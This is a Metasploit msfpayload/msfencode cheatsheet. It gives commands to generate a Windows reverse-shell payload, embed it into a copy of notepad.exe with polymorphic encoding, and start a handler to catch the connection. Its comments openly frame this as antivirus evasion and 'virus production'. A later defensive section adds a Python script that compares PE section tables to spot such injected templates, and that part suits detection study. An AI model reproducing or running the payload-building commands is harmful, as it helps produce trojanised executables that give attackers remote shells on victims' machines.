Msfpayload/Msfencoder cheatsheet

a little list of useful msfpayload/msfencoder commands

=========================================
A LITTLE MSFPAYLOAD/MSFENCODER CHEATSHEET
=========================================
Last modified: 08/12/2011
Author: [email protected]

******************************************************************************
msfpayload -l                               List all available payloads
msfpayload windows/shell/reverse_tcp S      Print the summary of the payload
------------------------------------------------------------------------
       Name: Windows Command Shell, Reverse TCP Stager
     Module: payload/windows/shell/reverse_tcp
    Version: 10394, 11421
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 290
       Rank: Normal

Provided by:
  spoonm
  sf
  hdm
  skape

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, none, process
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to the attacker, Spawn a piped command shell (staged)
------------------------------------------------------------------------
msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 x > program.exe

******************************************************************************
msfencode

OPTIONS:
  -a  The architecture to encode as
  -b  The list of characters to avoid: '\x00\xff'                  !!! FTW !!!
  -c  The number of times to encode the data                       !!! Fuck AV !!!
  -d  Specify the directory in which to look for EXE templates
  -e  The encoder to use
  -h  Help banner
  -i  Encode the contents of the supplied file path
  -k  Keep template working; run payload in new thread (use with -x)
  -l  List available encoders
  -m  Specifies an additional module search path
  -n  Dump encoder information
  -o  The output file
  -p  The platform to encode for
  -s  The maximum size of the encoded data
  -t  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
  -v  Increase verbosity
  -x  Specify an alternate executable template                     !!! VIRUS PRODUCTION !!!

SUPPORTED ENCODERS:
Name                    Rank       Description
----                    ----       -----------
cmd/generic_sh          good       Generic Shell Variable Substitution Command
cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command
generic/none            normal     The "none" Encoder
mipsbe/longxor          normal     XOR Encoder
mipsle/longxor          normal     XOR Encoder
php/base64              great      PHP Base64 encoder
ppc/longxor             normal     PPC LongXOR Encoder
ppc/longxor_tag         normal     PPC LongXOR Encoder
sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
x64/xor                 normal     XOR Encoder
x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
x86/countdown           normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
x86/nonalpha            low        Non-Alpha Encoder
x86/nonupper            low        Non-Upper Encoder
x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit   manual     Single Static Bit
x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

EXAMPLES:
  msfencode -e x86/alpha_mixed
  msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 R | msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai -o reversenotepad.exe

EXPLOIT SESSION HANDLER:
  msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=127.0.0.1 E
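The `-x notepad.exe` example above builds the payload into a copy of a legitimate program. An added check, not part of the original cheatsheet, that a defender can run on a suspect executable against the known-good file it claims to be: it reads both PE section tables and entry points with nothing but `struct` and reports new sections, resized sections and a moved entry point. The header-only PE builder and the sample byte strings are constructed here so it runs offline; that template injection shows up in exactly these fields is my assumption, not a claim the page makes.

```python
import struct

SECTION_HDR = "<8sIIIIIIHHI"   # PE/COFF section header layout: 40 bytes

def pe_sections(data: bytes):
    """Return (entry_point_rva, [(name, vaddr, vsize, raw_size), ...]) for a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, pe_off + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]    # SizeOfOptionalHeader
    opt_off = pe_off + 24                                        # optional header follows COFF header
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]      # AddressOfEntryPoint
    sects, off = [], opt_off + opt_size
    for _ in range(nsect):
        name, vsize, vaddr, raw = struct.unpack_from("<8sIII", data, off)
        sects.append((name.rstrip(b"\0").decode(errors="replace"), vaddr, vsize, raw))
        off += struct.calcsize(SECTION_HDR)
    return entry, sects

def compare_to_template(template: bytes, suspect: bytes):
    """List what the suspect binary changed relative to the clean template it claims to be."""
    t_entry, t_sects = pe_sections(template)
    s_entry, s_sects = pe_sections(suspect)
    findings = []
    if t_entry != s_entry:
        findings.append(f"entry point moved 0x{t_entry:x} -> 0x{s_entry:x}")
    by_name = {s[0]: s for s in t_sects}          # assumes section names are unique
    for name, vaddr, vsize, raw in s_sects:
        if name not in by_name:
            findings.append(f"new section {name!r} at rva 0x{vaddr:x} ({raw} raw bytes)")
        elif by_name[name][1:] != (vaddr, vsize, raw):
            findings.append(f"section {name!r} changed size or location")
    return findings

def build_pe(entry: int, sections):
    """Constructed header-only PE32 (no code) so the example runs offline; not a real notepad.exe."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                         # e_lfanew = 64
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry) + b"\0" * 76  # 96-byte optional header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    table = b"".join(struct.pack(SECTION_HDR, n.encode().ljust(8, b"\0"), vs, va, rs,
                                 0, 0, 0, 0, 0, 0x60000020) for n, va, vs, rs in sections)
    return dos + coff + opt + table

# Constructed sample: the clean template, and a copy that gained a section and a new entry point.
CLEAN = [(".text", 0x1000, 0x8000, 0x8000), (".data", 0x9000, 0x1000, 0x1000)]
TEMPLATE = build_pe(0x1000, CLEAN)
SUSPECT = build_pe(0xA000, CLEAN + [(".new", 0xA000, 0x200, 0x200)])

if __name__ == "__main__":
    print("\n".join(compare_to_template(TEMPLATE, SUSPECT)))
```

On a real pair of files, read both with `open(path, "rb").read()` and pass them to `compare_to_template`; an unchanged file yields an empty list.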